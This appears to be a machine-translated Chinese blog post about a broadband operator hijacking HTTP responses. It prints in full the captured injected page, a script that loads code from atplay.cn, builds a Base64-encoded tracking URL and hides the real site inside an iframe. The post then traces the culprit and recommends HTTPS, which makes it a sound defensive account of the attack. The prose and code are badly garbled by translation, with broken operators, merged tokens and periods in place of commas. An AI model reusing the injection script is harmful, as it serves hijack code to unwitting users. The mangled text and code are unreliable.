Original: Taste of Little Sister (wechat official ID: XjjDog), welcome to share, please reserve the source.
Operator hijacking, is a common rogue means, they all eat, even children do not let go, often arrogant in the lower right corner or web page head and tail, pop up some shy advertising. This makes it hard for a mother, who is helping her child with homework, to explain.
One, foreword
A classic interview question: What actually happens when you type in a web address and press enter?
It depends on what website to lose, Taobao chop hands, Baidu injury, Tencent injury kidney……
The mysterious return
The day was sunny and cloudless, with a delay of less than 50ms. It was a good day for free-range reptiles
Grass (a plant), has not been discovered? To look at
But this interface, it’s all JSON.
Drink white water to appease the result of hot mouth…… Think about it. Product light drink does not eat vegetables also can not fall this demand, say I this small mosquito is not apt to take cannon bar.
There must be! – ask! – the topic!
Scoop up the log, check the frequency. About 10 requests had one exception, and you were handed the entire HTML code. Let’s see, this guy wrote Base64 by hand.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta id="viewport" name="viewport" content="Width =device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
</head>
<script>
window["? $wins_pm"] = {
"a": "https://atplay.cn/banner/indexsd.aspx"."m": "http://baidu.com/"."_xus": "YBsOw1mgMPSOdBFpMBFjYBQjMZSjMBsXM3gO"."_xai": "0"
};
var xp=null,key="d=123",lo=location.href,ho=false;
function cu(u){
var p=u.indexOf("?");
if(p>0)
u=u.slice(0,p+1)+key+"&"+u.slice(p+1);
else
u+="?"+key;
return u;
}
function Base64() {
_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
this.encode = function(input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = _utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) < <4) | (chr2 >> 4);
enc3 = ((chr2 & 15) < <2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64
} else if (isNaN(chr3)) {
enc4 = 64
}
output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4)
}
return output
};
this.decode = function(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g."");
while (i < input.length) {
enc1 = _keyStr.indexOf(input.charAt(i++));
enc2 = _keyStr.indexOf(input.charAt(i++));
enc3 = _keyStr.indexOf(input.charAt(i++));
enc4 = _keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) < <4) | (enc3 >> 2);
chr3 = ((enc3 & 3) < <6) | enc4;
output = output + String.fromCharCode(chr1);
if(enc3 ! =64) {
output = output + String.fromCharCode(chr2)
}
if(enc4 ! =64) {
output = output + String.fromCharCode(chr3)
}
}
output = _utf8_decode(output);
return output
};
_utf8_encode = function(string) {
string = string.replace(/\r\n/g."\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c)
} else if ((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128)}else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128)}}return utftext
};
_utf8_decode = function(utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while (i < utftext.length) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++
} else if ((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i + 1);
string += String.fromCharCode(((c & 31) < <6) | (c2 & 63));
i += 2
} else {
c2 = utftext.charCodeAt(i + 1);
c3 = utftext.charCodeAt(i + 2);
string += String.fromCharCode(((c & 15) < <12) | ((c2 & 63) < <6) | (c3 & 63));
i += 3}}return string
}
}
window["__BASE64"] = new Base64();
function getURLwithParams() {
var url = "";
if(? $wins_pm.a.indexOf('? ') > 0) { url = ? $wins_pm.a +"&_us=" + ?$wins_pm._xus + "&_su="+ __BASE64.encode(? $wins_pm.m) +"&_id=" + ?$wins_pm._xai;
} else{ url = ? $wins_pm.a +"? _us=" + ?$wins_pm._xus + "&_su="+ __BASE64.encode(? $wins_pm.m) +"&_id=" + ?$wins_pm._xai;
}
return url;
}
function goURLm() {
vardesturl = ? $wins_pm.m;if (desturl.slice(desturl.length - 1) = ="/") desturl = desturl.slice(0, desturl.length - 1);
return "<html></head><script>document.location.replace(\"" + desturl + "\"); <\/script><\/html>"
};
</script>
<body style="margin:0; padding:0;">
<! --<div style="display: none;" ><script src="https://s6.cnzz.com/z_stat.php?id=722749&web_id=722749" language="JavaScript"></script></div>-->
<script type="text/javascript" src="https://atplay.cn/banner/indexsd.js"></script>
<div style="width:100%; height:100%; -webkit-overflow-scrolling:touch; overflow-y:scroll;">
<iframe id='ifrmain' src='JavaScript:parent.goURLm()' scrolling=auto width='100%' height='100%' frameborder='no' onload=' '></iframe>
</div>
</body>
</html>
Copy the code
3. The truth is out
Dubious! The truth is, this crappy code is not reptilian, not even gutter oil! Look at this urine is probably the hand of broadband operators, before visiting baidu is covered with an iframe. But I never expected ah, this desperate not even let go of json interface, but also change so big, thick, hard!
This is equivalent to just want to take a taxi out of the airport to scenic spots, the result is a black car ah, pulling to have a meal sauna big sword, empty wallet to pat the ground!
Since we’re sure it’s a black car, we’ll just move the stupid fish. Let’s look at the effect
Endure the diaphragm should turn over the code, find the domain, throw whois
Get the company name, throw Baidu, tianyan check, enterprise check… That’s him. That’s him
Four, the result?
Such an approach is usually impossible without the collusion of broadband operators. At present, there is an X letter and an X motion at home. After repeated tests, only the X motion line will have this problem. Then it would be simple
Work!!! Letter! Department! Throw! V.! Coordinates: DXSS. Miit. Gov. Cn /
The storm passed again, but it — I’m afraid it won’t be the last.
Five, what should I do with my website?
There’s nothing wrong with you hijacking. Soil is what it is. But you write this hijacking bot is also too silly, even json format are done, let people open the company how is good. You know, now a lot of services, there is no web end, hijacking the program to rise.
Once upon a time, our websites were all HTTP, which was a hijacking favorite. The solution is to upgrade to HTTPS to make hijacking more difficult and protect users as well as themselves.
Xjjdog is a public account that doesn’t allow programmers to get sidetracked. Focus on infrastructure and Linux. Ten years architecture, ten billion daily flow, and you discuss the world of high concurrency, give you a different taste. My personal wechat xjjdog0, welcome to add friends, further communication.